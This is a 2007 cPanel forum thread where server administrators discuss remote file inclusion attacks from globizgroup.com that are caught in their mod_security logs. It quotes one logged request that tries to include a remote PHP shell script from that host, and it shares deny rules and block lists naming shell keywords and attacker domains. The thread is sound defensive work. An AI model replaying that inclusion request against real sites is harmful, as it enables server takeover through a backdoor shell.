The Community Forums

Interact with an entire community of cPanel & WHM users.
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Mod_Sec Log with globizgroup.com in it

Discussion in 'General Discussion' started by isputra, Mar 29, 2007.

  1. isputra

    isputra Well-Known Member

    Joined:
    May 3, 2003
    Messages:
    576
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Mbelitar
  2. tanfwc

    tanfwc Well-Known Member

    Joined:
    Mar 12, 2004
    Messages:
    94
    Likes Received:
    0
    Trophy Points:
    6
    You might want to drop a email to their webmaster and inform them about this.
     
  3. isputra

    isputra Well-Known Member

    Joined:
    May 3, 2003
    Messages:
    576
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Mbelitar
    Email send but no response
     
  4. Infopro

    Infopro cPanel Sr. Product Evangelist
    Staff Member

    Joined:
    May 20, 2003
    Messages:
    14,450
    Likes Received:
    195
    Trophy Points:
    63
    Location:
    Pennsylvania
    cPanel Access Level:
    Root Administrator
    Twitter:
    globizgroup.com has a hack script on it, is from:

    globizgroup.com (195.70.36.180)

    195.70.36.0 - 195.70.36.255
    InterWare Inc.
    IPs for Server Hosting


    InterWare Network Administration
    InterWare Inc.
    Victor Hugo u. 18-22.
    H-1132 Budapest
    Hungary
    +36 1 4525300
    +36 1 4525301


    I think it's safe to say this one could be blocked, not talked to.

    IMO of course...
     
  5. ramprage

    ramprage Well-Known Member

    Joined:
    Jul 21, 2002
    Messages:
    667
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Canada
    Its just another PHP shell backdoor variant. I've seen hundreds of these before, nothing really different about this one.

    Ensure you have a good mod_security ruleset running to block this. Also proper system security measures applied like locking system binaries and disabling PHP functions will keep things like this from damaging your server.
     
  6. isputra

    isputra Well-Known Member

    Joined:
    May 3, 2003
    Messages:
    576
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Mbelitar
    Infopro : Ips already ban from my server but it seems that they use another ip to attact to my server

    IP
    147.83.200.242

    GET
    /archives/2005/03/07/perang-digital-dengan-malaysia/index.php?t=http://globizgroup.com/.img/dog.c? HTTP/1.1

    ramprage : yes, i already block this using mod_sec ruleset


    When googling about globizgroup.com i found that i am not the only one that have this problem :D

    See it here : http://www.google.co.id/search?q=globizgroup.com
     
  7. AlexandreVeezon

    AlexandreVeezon Well-Known Member

    Joined:
    Dec 9, 2005
    Messages:
    99
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    /br/sc/rionegrinho
    cPanel Access Level:
    Root Administrator
    Just to increase the information, you can add a rule to block the URL too:

    /etc/modsecurity/rules.conf
    Code:
    SecFilterSelective HTTP_Referer|ARGS "domain\.com"
    Hope you already solved the issue :)
     
  8. rogcan

    rogcan Well-Known Member

    Joined:
    Jun 7, 2004
    Messages:
    48
    Likes Received:
    0
    Trophy Points:
    6

    So to block out a website like globizgroup.com would it be done like this ??
    SecFilterSelective HTTP_Referer|ARGS "globizgroup\.com"
    Just want to make sure im doing this right so my apoligies on the silly question.

    I also dont have that rules.conf file or a modsecurity folder where you claim it is but i do have mod security installed as an addon.
    so im assuming the location to put this in is /usr/local/apache/conf/modsec.user.conf instead of /etc/modsecurity/rules.conf correct ?
     
    #8 rogcan, Apr 25, 2007
    Last edited: Apr 25, 2007
  9. AlexandreVeezon

    AlexandreVeezon Well-Known Member

    Joined:
    Dec 9, 2005
    Messages:
    99
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    /br/sc/rionegrinho
    cPanel Access Level:
    Root Administrator
    I installed the modsecurity manually, not in WHM addon.
    But you just want to add the line in your modsec config file.
    If you don't know what file is, just open your httpd.conf file and look for

    Code:
    #Application protection rules
    Include /etc/modsecurity/rules.conf
    
    Edit this file and put the line in there.

    Here, some examples:

    Code:
    SecFilter "chmod" "deny,log"
    SecFilter "perl\%20" "deny,log"
    SecFilter "lynx\%20" "deny,log"
    SecFilter "mosConfig_absolute_path" "deny,log"
    SecFilter "sndir" "deny,log"
    SecFilter "pagename" "deny,log"
    SecFilter "phpbb_root_path" "deny,log"
    SecFilter "cmd" "deny,log"
    SecFilter "PGV_BASE_DIRECTORY" "deny,log"
    
    SecFilterSelective THE_REQUEST "perl " deny
    SecFilterSelective THE_REQUEST "mosConfig_absolute_path" deny
    
    SecFilterSelective HTTP_Referer|ARGS "tinypath\.com"
    SecFilterSelective HTTP_Referer|ARGS "hce\.edu\.vn"
    SecFilterSelective HTTP_Referer|ARGS "molganinovo\.ru"
    SecFilterSelective HTTP_Referer|ARGS "siaol\.com\.ua"
    SecFilterSelective HTTP_Referer|ARGS "globalsquid\.com"
    
    And answering your question, your are correct, you just have to add the line as your typed in here:

    Code:
    SecFilterSelective HTTP_Referer|ARGS "globizgroup\.com"
    After this, just look to the modsec_debug_log if you have this enable in http.conf (look for debug level 1 in your http.conf modsec section)

    Hope this will help you :D
     
  10. rogcan

    rogcan Well-Known Member

    Joined:
    Jun 7, 2004
    Messages:
    48
    Likes Received:
    0
    Trophy Points:
    6
    Appreciate the confirmation _xandih :)
     
  11. AlexandreVeezon

    AlexandreVeezon Well-Known Member

    Joined:
    Dec 9, 2005
    Messages:
    99
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    /br/sc/rionegrinho
    cPanel Access Level:
    Root Administrator
    ;D

    we're in here to help each other right?!
    Regards!
    see ya!
     
  12. rogcan

    rogcan Well-Known Member

    Joined:
    Jun 7, 2004
    Messages:
    48
    Likes Received:
    0
    Trophy Points:
    6
  13. AlexandreVeezon

    AlexandreVeezon Well-Known Member

    Joined:
    Dec 9, 2005
    Messages:
    99
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    /br/sc/rionegrinho
    cPanel Access Level:
    Root Administrator
    Good!

    Add these in my rules :D

    Thank you!
     
Loading...

Share This Page